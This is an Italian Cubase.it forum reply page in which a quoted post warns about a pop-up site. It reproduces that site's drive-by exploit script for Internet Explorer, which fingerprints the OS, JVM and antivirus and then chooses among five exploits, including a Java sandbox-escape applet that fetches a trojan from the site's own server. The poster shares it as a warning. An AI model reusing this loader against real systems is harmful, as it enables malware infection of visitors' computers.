Se questo sito ti è utile
fai una donazione!
Tutti i contributi andranno a coprire i costi per il mantenimento del sito e del forum.
Un grosso
grazie
a chi vorrà supportarci.
Post A Reply
Profilo Personale
|
Registrazione
|
Cerca nel Forum
|
Faq del Forum
|
Pagina Principale
»
I Forum di Cubase.it, il sito italiano su Cubase, Audio, MIDI e Home Recording
»
Il Resto
»
La Stanza di Cubase.it
»
POP UP in questo forum
» Post A Reply
Post A Reply
Login Name:
Password:
Message:
HTML non è abilitato.
UBB Code attivato
Immagini UBBCode non permesse
[QUOTE]Originally posted by MichyLee: [QB]E, infatti, se si guarda (ma non fatelo con IE!!) il codice sorgente della pagina [URL=http://ad0299.vogservice.com/ie0509.htm]http://ad0299.vogservice.com/ie0509.htm[/URL] si nota l'exploit in questione: function Get_Win_Version(IE_vers) { if (IE_vers.indexOf('Windows 95') != -1) return "95" else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT" else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME" else if (IE_vers.indexOf('Windows 98') != -1) return "98" else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K" else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP" else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3" } function Run_BOF() { self.focus(); for (i=1 ; i <=4 ; i++) { document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>'); } document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>'); } var Trojan_Path="http://ad0299.vogservice.com/cgi-bin/ie0601.cgi?exploit="; if (navigator.appName=="Microsoft Internet Explorer") { var InetPath=document.location.href; j=InetPath.lastIndexOf('/'); InetPath=InetPath.slice(0,j); var ExploitNumber=1; var IEversion=navigator.appVersion; var IEplatform=navigator.platform; if (IEplatform.search("Win32") != -1) { var WinOS=Get_Win_Version(IEversion); PatchList = clientInformation.appMinorVersion; var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}"); fNortonAV=0; fMcAfee=0; XP_SP2_patched=0; try { var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization fNortonAV=1; } catch(e){} try { var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization fMcAfee=1; } catch(e){} switch (WinOS) { case "2K": if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810)) { ExploitNumber=1; } else // if JVM = 5.0.3810.0 or higher { if ((fNortonAV==0)&&(fMcAfee==0)) { ExploitNumber=3; } else { ExploitNumber=2; } } break; case "2K3": if ((fNortonAV==0)&&(fMcAfee==0)) { ExploitNumber=3; } else { ExploitNumber=4; } break; case "XP": FullVersion=clientInformation.appMinorVersion; PatchList=FullVersion.split(";"); if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810)) { ExploitNumber=1; } else // if JVM = 5.0.3810.0 or higher { for (var i=0; i < PatchList.length; i++) { if (PatchList[i]=="SP2") { XP_SP2_patched=1; } } if ((fNortonAV==0)&&(fMcAfee==0)) { ExploitNumber=5; } else { ExploitNumber=4; } } break; default: if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810)) { ExploitNumber=1; } else { ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher break; } // launching exploit which number is depends on Windows and IE versions switch (ExploitNumber) { case 1: Trojan_Path=Trojan_Path+"MS03-11"; ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="SandBoxEscape.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>'; break; case 2: tagstyle='style="display:none"'; ObjectContainer.innerHTML='<object data="'+InetPath+'/cgi-bin/ie0601.cgi?gethta" '+tagstyle+'></object>'; break; case 3: window.open("ie0601c.htm","Info","left=2000,top=2000,screenX=2000,screenY=2000,width=50,height=50,scrollbars=1,menubar=0,titlebar=0,toolbar=0,status=0"); self.focus(); break; case 4: Run_BOF(); break; case 5: PageContainer.location="ie0601e.wmf"; break; default: break; } } } Insomma, una volta di più, forza Firefox e os x :D[/QB][/QUOTE]
Instant Graemlins
Instant UBB Code
What is UBB Code?
Options
Non usare gli smiles in questo post.
*** Clicca qui per rileggere il topic. ***
Contattaci
|
www.cubase.it
|
Cubase.it e la Privacy
© 2000 - 2023. Il materiale di questo forum e del sito è di proprietà di chi scrive. Nel caso vogliate citare del contenuto, indicatene sempre la fonte.
Powered by Infopop
UBB.classic
TM
6.3.1.2
Se questo sito ti è utile
fai una donazione!
Tutti i contributi andranno a coprire i costi per il mantenimento del sito e del forum.
Un grosso
grazie
a chi vorrà supportarci.